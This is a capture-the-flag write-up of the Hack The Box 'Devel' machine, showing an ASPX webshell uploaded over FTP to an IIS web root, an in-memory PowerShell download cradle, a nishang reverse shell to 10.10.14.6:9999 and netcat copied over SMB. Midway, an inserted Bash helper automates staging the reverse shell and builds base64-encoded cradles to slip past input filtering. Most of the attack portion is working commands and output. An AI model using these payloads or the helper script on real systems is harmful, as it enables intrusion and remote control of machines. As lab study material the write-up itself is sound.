File Upload
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ tree /usr/share/webshells/asp*
/usr/share/webshells/asp
├── cmd-asp-5.1.asp
└── cmdasp.asp
/usr/share/webshells/aspx
└── cmdasp.aspx
0 directories, 3 files
Three .NET-based webshells are available locally (two classic ASP, one ASP.NET).
I will go with cmdasp.aspx, since the target web application runs on ASP.NET (IIS).
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx . ; mv cmdasp.aspx webshell.aspx
I copied the file to the current working directory and renamed it webshell.aspx.
ftp> put webshell.aspx
local: webshell.aspx remote: webshell.aspx
229 Entering Extended Passive Mode (|||49173|)
125 Data connection already open; Transfer starting.
100% |**********************************************************************************| 1442 23.70 MiB/s --:-- ETA
226 Transfer complete.
1442 bytes sent in 00:00 (45.41 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49174|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
10-13-22 07:16PM 1442 webshell.aspx
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
I uploaded webshell.aspx to the FTP server. The FTP root is the IIS web root (the listing shows the default iisstart.htm, welcome.png and aspnet_client), so anything dropped here is served by the web server.
Upload successful.
webshell.aspx is now reachable from the web root, as expected.
But I don't want to work out of this limited webshell; a stable shell has to be established.
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ cp /home/kali/Tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.6 -Port 9999" >> Invoke-PowerShellTcp.ps1
nishang's Invoke-PowerShellTcp.ps1 script is a good choice here: it is pure PowerShell, so nothing has to be compiled for the target.
I will start a web server on Kali to host this script for the target system to fetch.
I also appended the invocation itself to the bottom of the script, so the reverse shell fires as soon as the script is fetched and evaluated; the script alone only defines the function.
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ simplehttp .
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Starting a web server on Kali port 8000 (simplehttp is a local alias for Python's http.server module), hosting the Invoke-PowerShellTcp.ps1 script.
powershell -ep bypass iex (new-object net.webclient).downloadstring('http://10.10.14.6:8000/Invoke-PowerShellTcp.ps1')
The command above is submitted through webshell.aspx. It sends a GET request to http://10.10.14.6:8000/Invoke-PowerShellTcp.ps1 and hands the response to Invoke-Expression (iex), so the script runs in memory and is never written to the target's disk. -ep bypass sidesteps the execution policy for this process only.
The GET shows up in the http.server log on Kali, confirming that the PowerShell script has been fetched by the target machine.
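The staging steps above (copy the nishang script, append the invocation, build the download cradle for the webshell) as a small Bash helper. This is an added example, not part of the original writeup or of nishang; it assumes the same values as the writeup (attacker 10.10.14.6, HTTP on 8000, listener on 9999, nishang checked out under ~/Tools/nishang), all overridable through environment variables. It also goes one step beyond the page: encode_cradle wraps the same command for -EncodedCommand (base64 of UTF-16LE), which is the form to use when a webshell's input field mangles quotes or parentheses.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): stage nishang's
# Invoke-PowerShellTcp.ps1 and build the PowerShell download cradle that the
# webshell executes. Assumed defaults mirror the writeup; override via env.
set -euo pipefail

LHOST="${LHOST:-10.10.14.6}"     # Kali IP the target connects back to
HTTP_PORT="${HTTP_PORT:-8000}"   # port python3 -m http.server listens on
LPORT="${LPORT:-9999}"           # netcat listener port

# Copy the nishang script to $2 and append the invocation line, so the
# reverse shell starts as soon as the fetched text is passed to iex.
stage_nishang() {
    local src="$1" dst="$2"
    cp "$src" "$dst"
    printf '\nInvoke-PowerShellTcp -Reverse -IPAddress %s -Port %s\n' \
        "$LHOST" "$LPORT" >> "$dst"
}

# Plain cradle to paste into the webshell: fetch over HTTP, evaluate in memory.
build_cradle() {
    local name="$1"
    printf "powershell -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('http://%s:%s/%s')\"" \
        "$LHOST" "$HTTP_PORT" "$name"
}

# Same command as -EncodedCommand: PowerShell expects base64 of UTF-16LE text,
# which survives any quoting or form encoding the webshell applies.
encode_cradle() {
    local name="$1" inner
    inner=$(printf "iex (New-Object Net.WebClient).DownloadString('http://%s:%s/%s')" \
        "$LHOST" "$HTTP_PORT" "$name")
    printf 'powershell -ep bypass -EncodedCommand %s' \
        "$(printf '%s' "$inner" | iconv -f UTF-8 -t UTF-16LE | base64 | tr -d '\n')"
}

# Reverse of the encoding, to confirm what the target will actually run.
decode_encoded() {
    printf '%s' "$1" | base64 -d | iconv -f UTF-16LE -t UTF-8
}

# Run as "./stage.sh stage" to produce the staged script and both cradles.
if [ "${1:-}" = "stage" ]; then
    stage_nishang "$HOME/Tools/nishang/Shells/Invoke-PowerShellTcp.ps1" \
        ./Invoke-PowerShellTcp.ps1
    build_cradle Invoke-PowerShellTcp.ps1; echo
    encode_cradle Invoke-PowerShellTcp.ps1; echo
fi
```

After staging, serve the directory with `python3 -m http.server 8000` and start the listener (`nc -nlvp 9999`) in separate terminals before submitting either cradle through the webshell; the GET for Invoke-PowerShellTcp.ps1 in the http.server log is the first sign the cradle executed.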
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.5] 49166
Windows PowerShell running as user DEVEL$ on DEVEL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>
PS C:\windows\system32\inetsrv> whoami
iis apppool\web
PS C:\windows\system32\inetsrv> hostname
devel
PS C:\windows\system32\inetsrv> ipconfig
Windows IP Configuration

Ethernet adapter Local Area Connection 3:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::58c0:f1cf:abc6:bb9e
   Temporary IPv6 Address. . . . . . : dead:beef::1431:9150:87cb:761b
   Link-local IPv6 Address . . . . . : fe80::58c0:f1cf:abc6:bb9e%15
   IPv4 Address. . . . . . . . . . . : 10.10.10.5
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
                                       10.10.10.2

Tunnel adapter isatap.{c57f02f8-df4f-40ee-bc21-a206b3f501e4}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Tunnel adapter Local Area Connection* 9:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
The netcat listener (nnc is a local alias for a netcat listener) received the connection and a shell was established as the IIS worker process executed the script. Note that nishang's banner reports the user as DEVEL$ while whoami reports iis apppool\web: the application pool runs under a virtual account, and $env:USERNAME for such accounts is the computer account name. whoami is the authoritative answer.
Initial foothold as iis apppool\web via file upload.
NC64.exe
PS C:\> mkdir tmp ; cd tmp
    Directory: C:\
Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----           13/1/2023   9:51 ??         tmp
PS C:\tmp> copy \\10.10.14.6\smb\nc.exe nc.exe
Making a directory at the system root, C:\tmp, to use as the working directory for this operation.
I also transferred netcat to the target over SMB, from a share named smb hosted on Kali (10.10.14.6). Copying with copy rather than executing directly from the share keeps nc.exe usable even after the share is taken down.